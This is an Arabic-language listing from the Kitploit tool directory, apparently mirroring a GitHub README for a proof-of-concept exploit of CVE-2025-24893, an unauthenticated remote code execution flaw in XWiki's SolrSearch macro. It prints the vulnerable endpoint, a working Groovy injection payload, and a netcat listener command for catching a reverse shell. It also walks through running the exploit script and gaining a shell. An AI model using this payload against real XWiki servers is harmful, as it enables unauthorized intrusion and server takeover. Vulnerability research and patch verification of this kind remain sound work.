Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-24893 — استغلال إثبات المفهوم لـ CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في XWiki عبر معالجة غير آمنة لتعبيرات Groovy في ماكرو SolrSearch. | Kitploit
أدوات/GitHubGitHub/fomovet/cve-2025-24893
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubfomovet/cve-2025-24893

cve-2025-24893

استغلال إثبات المفهوم لـ CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في XWiki عبر معالجة غير آمنة لتعبيرات Groovy في ماكرو SolrSearch.

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24893 - استغلال RCE بدون مصادقة في XWiki (POC)

⚠️ تنفيذ أوامر عن بُعد بدون مصادقة في XWiki
🛠️ تنفيذ PoC بواسطة @dollarboysushil

💡 نظرة عامة

CVE-2025-24893 هي ثغرة RCE حرجة في XWiki، ناتجة عن معالجة غير آمنة لتعبيرات Groovy داخل ماكرو SolrSearch. يمكن للمهاجم حقن كود Groovy عبر طلب GET مخصص، مما يؤدي إلى تنفيذ أوامر عن بُعد (بدون الحاجة إلى مصادقة).

  • الخطورة: حرجة (CVSS 9.8)
  • الإصدارات المتأثرة: الإصدارات < 15.10.11، 16.4.1، 16.5.0RC1

🛠 التفاصيل التقنية

تقع الثغرة في ماكرو SolrSearch (Main.SolrSearch) في XWiki، والذي يعالج مدخلات البحث باستخدام تقييم غير آمن لـ Groovy. يفشل الماكرو في تنظيف المدخلات المقدمة من المستخدم، مما يسمح بـتنفيذ أوامر عشوائية.

🔥 نقطة الضعف القابلة للاستغلال

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

يمكن للمهاجم حقن كود Groovy في معامل text، والذي يتم تقييمه من جهة الخادم بسبب معالجة المدخلات غير الصحيحة داخل نظام الماكرو.

💥 مثال على الحمولة

root@kitploit:~
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

يؤدي هذا إلى تنفيذ أوامر عن بُعد (RCE) بدون مصادقة على نسخ XWiki القابلة للاستغلال.

🔬 عرض إثبات المفهوم (PoC)

🧪 بيئة الهدف

الهدف القابل للاستغلال هو نسخة XWiki تعمل بالإصدار 15.10.8، المتأثر بـ CVE-2025-24893.

واجهة XWiki القابلة للاستغلال


📡 تجهيز المستمع

شغّل مستمع Netcat على جهاز المهاجم لالتقاط اتصال الصدفة العكسية:

root@kitploit:~
nc -lvnp 1337

مستمع Netcat نشط على المنفذ 1337


🚀 تشغيل الاستغلال

شغّل سكريبت الاستغلال CVE-2025-24893-dbs.py لتسليم حمولة RCE القائمة على Groovy إلى نقطة الضعف في XWiki.

تشغيل سكريبت الاستغلال


💻 الوصول الناجح إلى الصدفة عن بُعد

عند التنفيذ الناجح، ستتصل الصدفة العكسية بالمستمع، مما يمنح المهاجم وصولاً عن بُعد إلى الخادم.

تم الحصول على الصدفة العكسية


📚 المراجع

  • مدونة OffSec: CVE-2025-24893 XWiki Groovy RCE
  • إدخال NVD: CVE-2025-24893
تنزيل الأداة